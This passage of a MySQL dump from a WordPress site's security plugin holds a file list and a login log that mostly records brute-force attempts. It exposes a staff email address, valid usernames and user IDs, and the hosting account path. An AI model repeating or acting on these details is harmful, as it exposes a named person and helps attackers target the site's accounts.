gets/class-wp-widget-tag-cloud.php','wp-includes/widgets/class-wp-widget-tag-cloud.php'),(16418,'/home/tummmyov/tummyrevolution.com/wp-includes/widgets/class-wp-widget-text.php','wp-includes/widgets/class-wp-widget-text.php'),(16419,'/home/tummmyov/tummyrevolution.com/wp-includes/widgets.php','wp-includes/widgets.php'),(16420,'/home/tummmyov/tummyrevolution.com/wp-includes/wp-db.php','wp-includes/wp-db.php'),(16421,'/home/tummmyov/tummyrevolution.com/wp-includes/wp-diff.php','wp-includes/wp-diff.php'),(16422,'/home/tummmyov/tummyrevolution.com/wp-links-opml.php','wp-links-opml.php'),(16423,'/home/tummmyov/tummyrevolution.com/wp-load.php','wp-load.php'),(16424,'/home/tummmyov/tummyrevolution.com/wp-login.php','wp-login.php'),(16425,'/home/tummmyov/tummyrevolution.com/wp-mail.php','wp-mail.php'),(16426,'/home/tummmyov/tummyrevolution.com/wp-settings.php','wp-settings.php'),(16427,'/home/tummmyov/tummyrevolution.com/wp-signup.php','wp-signup.php'),(16428,'/home/tummmyov/tummyrevolution.com/wp-trackback.php','wp-trackback.php'),(16429,'/home/tummmyov/tummyrevolution.com/xmlrpc.php','xmlrpc.php'); /*!40000 ALTER TABLE `wpvt_wfknownfilelist` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wflivetraffichuman` -- DROP TABLE IF EXISTS `wpvt_wflivetraffichuman`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wflivetraffichuman` ( `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `expiration` int(10) unsigned NOT NULL, PRIMARY KEY (`IP`,`identifier`), KEY `expiration` (`expiration`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wflivetraffichuman` -- LOCK TABLES `wpvt_wflivetraffichuman` WRITE; /*!40000 ALTER TABLE `wpvt_wflivetraffichuman` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wflivetraffichuman` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wflocs` -- DROP TABLE IF EXISTS `wpvt_wflocs`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wflocs` ( `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `ctime` int(10) unsigned NOT NULL, `failed` tinyint(3) unsigned NOT NULL, `city` varchar(255) DEFAULT '', `region` varchar(255) DEFAULT '', `countryName` varchar(255) DEFAULT '', `countryCode` char(2) DEFAULT '', `lat` float(10,7) DEFAULT 0.0000000, `lon` float(10,7) DEFAULT 0.0000000, PRIMARY KEY (`IP`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wflocs` -- LOCK TABLES `wpvt_wflocs` WRITE; /*!40000 ALTER TABLE `wpvt_wflocs` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wflocs` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wflogins` -- DROP TABLE IF EXISTS `wpvt_wflogins`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wflogins` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `hitID` int(11) DEFAULT NULL, `ctime` double(17,6) unsigned NOT NULL, `fail` tinyint(3) unsigned NOT NULL, `action` varchar(40) NOT NULL, `username` varchar(255) NOT NULL, `userID` int(10) unsigned NOT NULL, `IP` binary(16) DEFAULT NULL, `UA` text DEFAULT NULL, PRIMARY KEY (`id`), KEY `k1` (`IP`,`fail`), KEY `hitID` (`hitID`) ) ENGINE=MyISAM AUTO_INCREMENT=2384 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wflogins` -- LOCK TABLES `wpvt_wflogins` WRITE; /*!40000 ALTER TABLE `wpvt_wflogins` DISABLE KEYS */; INSERT INTO `wpvt_wflogins` (`id`, `hitID`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES (2062,7236,1696849755.725858,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\07','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2060,7234,1696849699.023204,1,'loginFailValidUsername','admin',1,'(\rYqC\0Bps','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2061,7235,1696849700.449458,1,'loginFailValidUsername','admin',1,'(\rYqC\0Bps','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2058,7232,1696848804.857562,1,'loginFailValidUsername','admin',1,'$% FBp\\O','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2059,7233,1696848806.478557,1,'loginFailValidUsername','admin',1,'$% FBp\\O','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2057,7231,1696848179.073691,1,'loginFailInvalidUsername','tummyrevolution',0,'*?`K Ϡ`\nQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2056,7230,1696848177.616767,1,'loginFailInvalidUsername','tummyrevolution',0,'*?`K Ϡ`\nQ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2055,7228,1696847222.376398,1,'loginFailInvalidUsername','tummyrevolution',0,'(7X\0`wRCh','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2054,7227,1696847220.767838,1,'loginFailInvalidUsername','tummyrevolution',0,'(7X\0`wRCh','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2053,7224,1696844762.255622,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ge','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2052,7223,1696844760.749407,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0ge','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2051,7220,1696841199.444093,0,'loginOK','Bibbi',3,'\0\0\0\0\0\0\0\0\0\0[K{','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2050,7219,1696841169.886578,1,'loginFailValidUsername','bibbi',3,'\0\0\0\0\0\0\0\0\0\0[K{','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2049,7215,1696837303.327676,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0iY','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2047,7211,1696836536.640815,1,'loginFailValidUsername','admin',1,'$ڠRso','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2048,7214,1696837300.784763,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0iY','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2046,7210,1696836535.156014,1,'loginFailValidUsername','admin',1,'$ڠRso','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2045,7209,1696836356.438548,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0<\nq','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2044,7208,1696836354.876385,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0<\nq','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2043,7207,1696836209.439431,1,'loginFailValidUsername','admin',1,' ODSjn[','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2042,7206,1696836207.856826,1,'loginFailValidUsername','admin',1,' ODSjn[','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2040,7204,1696835567.838530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0w\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2041,7205,1696835569.699354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0w\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2039,7203,1696834753.937426,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2038,7202,1696834752.364048,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0WG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2037,7201,1696834388.815354,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2036,7200,1696834387.254201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2035,7199,1696833709.572898,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0RrTP','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2033,7197,1696830284.431358,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0<$','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2034,7198,1696833708.092382,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0RrTP','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2032,7196,1696830283.026293,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0<$','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2142,7448,1696999456.571310,1,'loginFailValidUsername','admin',1,'*\0\Z(]\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(2141,7439,1696993712.388145,1,'loginFailInvalidUsername','tummyrevolution',0,'(*\0\0\nm=qzysA&j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2140,7438,1696993710.683576,1,'loginFailInvalidUsername','tummyrevolution',0,'(*\0\0\nm=qzysA&j','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2139,7393,1696979490.977250,1,'loginFailInvalidUsername','tummyrevolution',0,'(*\0\0\nm) ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2137,7390,1696977172.837761,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0)[','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2138,7392,1696979489.583773,1,'loginFailInvalidUsername','tummyrevolution',0,'(*\0\0\nm) ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2136,7389,1696977171.278955,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0)[','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2135,7386,1696976217.769840,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2134,7385,1696976216.054411,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2133,7381,1696971730.476190,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0tX\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2132,7380,1696971729.177280,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0tX\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2131,7379,1696970870.326883,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0tX\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2130,7378,1696970869.096194,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0tX\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2129,7374,1696968095.801441,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0\0Ȁ z3','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2128,7373,1696968094.146973,1,'loginFailInvalidUsername','tummyrevolution',0,'(\0\0Ȁ z3','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2127,7366,1696960474.667148,1,'loginFailValidUsername','admin',1,'* \0\0\08qvD','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2126,7365,1696960473.287921,1,'loginFailValidUsername','admin',1,'* \0\0\08qvD','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2125,7363,1696959774.275742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Qg','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2124,7362,1696959772.417198,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Qg','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2122,7358,1696958762.374529,1,'loginFailValidUsername','admin',1,'*$\Z\0*\0mrՁ\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2123,7359,1696958763.687980,1,'loginFailValidUsername','admin',1,'*$\Z\0*\0mrՁ\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2120,7356,1696957220.155402,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0T+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2121,7357,1696957221.556002,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0T+','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2119,7345,1696950030.859808,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0PG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2118,7344,1696950029.524047,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0PG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2117,7342,1696948610.058259,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\rr','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2116,7341,1696948608.661924,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\\rr','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2115,7338,1696942190.741862,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2114,7337,1696942182.624212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0r','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2113,7336,1696940622.823142,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0s','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2112,7335,1696940621.145653,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0s','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2111,7333,1696937772.819221,1,'loginFailInvalidUsername','tummyrevolution',0,'*?`K =nT','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2110,7332,1696937771.436814,1,'loginFailInvalidUsername','tummyrevolution',0,'*?`K =nT','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2108,7328,1696933917.214228,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2109,7329,1696933918.883323,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2107,7326,1696933663.196373,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Rv','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2106,7325,1696933647.902878,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0Rv','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2105,7321,1696922423.592378,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2104,7320,1696922422.192744,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0g\\','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2103,7318,1696919221.882550,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2102,7317,1696919175.516095,1,'loginFailInvalidUsername','sara.chadwick@tummyrevolution.co.uk',0,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2101,7316,1696919169.353179,1,'loginFailInvalidUsername','sara.chadwick@tummyrevolution.co.uk',0,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2208,8842,1697554839.798191,1,'loginFailInvalidUsername','wwwadmin',0,'$\0a\0\0\0\0\0\0\0m','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2207,8842,1697554839.787773,1,'loginFailInvalidUsername','wwwadmin',0,'$\0a\0\0\0\0\0\0\0m','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(2206,8829,1697549048.994268,1,'loginFailValidUsername','admin',1,'&\0`\0\0\0\0\0;','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(2205,8828,1697548912.237786,1,'loginFailInvalidUsername','Biljana Toft',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0'),(2204,8827,1697548912.152236,1,'loginFailInvalidUsername','Mini Gut Guru',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0'),(2203,8814,1697544809.893495,1,'loginFailValidUsername','admin',1,'&\0/\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(2202,8814,1697544809.877503,1,'loginFailValidUsername','admin',1,'&\0/\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(2201,8810,1697543700.829919,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0\'e','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(2187,8525,1697469752.473467,1,'loginFailValidUsername','admin',1,'&\0\0\0+El(','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2188,8526,1697469753.547281,1,'loginFailValidUsername','admin',1,'&\0\0\0+El(','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2186,8524,1697469689.438520,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0E˹','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2185,8511,1697461336.450371,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2154,7735,1697064671.488645,1,'loginFailValidUsername','sara',2,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(2153,7687,1697055090.491566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0} ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(2152,7671,1697052473.762596,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2150,7669,1697052133.634421,1,'loginFailValidUsername','admin',1,',h:\0=L','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2151,7670,1697052472.345327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2149,7668,1697052131.950784,1,'loginFailValidUsername','admin',1,',h:\0=L','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2148,7621,1697046543.202833,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0>g_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2147,7595,1697041075.404141,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0>g_','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2146,7568,1697034846.897584,1,'loginFailInvalidUsername','tummyrevolution',0,'$I\0Rѭ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2145,7463,1697016044.469118,0,'loginOK','Bibbi',3,'\0\0\0\0\0\0\0\0\0\03s3','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2144,7460,1697010725.741519,1,'loginFailInvalidUsername','tummyrevolution',0,'$ @-\no\n}f','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2143,7459,1697010592.685050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#ڝ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2184,8510,1697461335.086661,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0B\Z','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2183,8497,1697455416.518370,1,'loginFailValidUsername','admin',1,'$\0a\0\0\0\0\0\00','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0'),(2182,8487,1697451327.334667,1,'loginFailInvalidUsername','petertan-admin',0,'\0\0\0\0\0\0\0\0\0\0\rqj','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(2169,7996,1697287399.605731,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0tX`F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2168,7995,1697287398.234030,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0tX`F','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2167,7962,1697276348.529790,1,'loginFailValidUsername','admin',1,'* #%\0_]','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2166,7961,1697276346.619084,1,'loginFailValidUsername','admin',1,'* #%\0_]','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2161,7901,1697191985.330613,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0э3','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(2157,7827,1697112750.979284,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0wf','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2156,7802,1697097337.898726,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0͹s','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(2155,7793,1697092240.458850,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0^f','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(2160,7878,1697167139.269272,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(2158,7847,1697131631.166772,1,'loginFailValidUsername','admin',1,'&\0\0\0+ԻG','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2159,7849,1697132940.302041,1,'loginFailValidUsername','admin',1,'&\08:','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2164,7921,1697217660.400881,1,'loginFailValidUsername','admin',1,'* \"x\0\\ǀ','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2165,7948,1697271248.213599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0э\"','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),(2163,7920,1697217573.994651,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0\\6','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),(2162,7919,1697215385.312618,1,'loginFailInvalidUsername','tummyrevolution',0,'\0\0\0\0\0\0\0\0\0\0_Uu','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like 